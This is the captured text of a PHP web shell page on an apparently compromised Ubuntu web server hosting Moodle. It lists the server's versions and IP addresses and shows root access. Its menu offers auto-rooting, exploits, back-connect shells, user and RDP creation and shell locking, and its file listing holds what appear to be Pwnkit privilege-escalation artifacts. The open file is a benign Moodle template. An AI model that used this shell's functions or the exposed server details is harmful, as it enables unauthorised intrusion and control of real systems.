Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
auth /
mnet /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
auth.php
52.3
KB
-rwxrwxrwx
config.html
2.46
KB
-rwxrwxrwx
jump.php
2.36
KB
-rwxrwxrwx
land.php
2.35
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
version.php
1.18
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.html
<?php global $OUTPUT; // set to defaults if undefined if (!isset($config->rpc_negotiation_timeout)) { $config->rpc_negotiation_timeout = '30'; } /* See MDL-21327 for why this is commented out if (!isset ($config->auto_add_remote_users)) { $config->auto_add_remote_users = '0'; } */ $yesno = array(get_string('no'), get_string('yes')); if (empty($CFG->mnet_dispatcher_mode) || $CFG->mnet_dispatcher_mode !== 'strict') { echo $OUTPUT->box(get_string('mnetdisabled','mnet')); } ?> <div id="mnetconfig"> <table cellspacing="0" cellpadding="5"> <tr valign="top" class="required"> <td align="right"><label for="rpc_negotiation_timeout"><?php print_string('rpc_negotiation_timeout', 'auth_mnet'); ?>: </label></td> <td> <input name="rpc_negotiation_timeout" id="rpc_negotiation_timeout" type="text" size="5" value="<?php echo $config->rpc_negotiation_timeout ?>" /> <?php if (isset($err['rpc_negotiation_timeout'])) { echo $OUTPUT->error_text($err['rpc_negotiation_timeout']); } ?> </td> <td> <?php print_string('auth_mnet_rpc_negotiation_timeout', 'auth_mnet'); ?> </td> </tr> <?php /* See MDL-21327 for why this is commented out <tr valign="top" class="required"> <td align="right"><?php echo html_writer::label(get_string('auto_add_remote_users', 'auth_mnet'), 'menuauto_add_remote_users'); ?>: </td> <td> <?php echo html_writer::select($yesno, 'auto_add_remote_users', $config->auto_add_remote_users, false); ?> </td> <td> <?php print_string('auth_mnet_auto_add_remote_users', 'auth_mnet'); ?> </td> </tr> */ ?> <tr valign="top" class="required"> <td colspan="3"><?php print_string('auth_mnet_roamin', 'auth_mnet'); ?>: </td> </tr> <?php foreach($id_providers as $host) { ?> <tr valign="top" class="required"> <td align="right"><?php echo $host['name']; ?>: </td> <td colspan="2"><?php echo $host['wwwroot']; ?> </td> </tr> <?php } ?> <tr valign="top" class="required"> <td colspan="3"><?php print_string('auth_mnet_roamout', 'auth_mnet'); ?>: </td> </tr> <?php foreach($service_providers as $host) { ?> <tr valign="top" class="required"> <td align="right"><?php echo $host['name']; ?>: </td> <td colspan="2"><?php echo $host['wwwroot']; ?> </td> </tr> <?php } // print_auth_lock_options($this->authtype, $user_fields, get_string('auth_fieldlocks_help', 'auth'), false, false); ?> </table> </div>
Close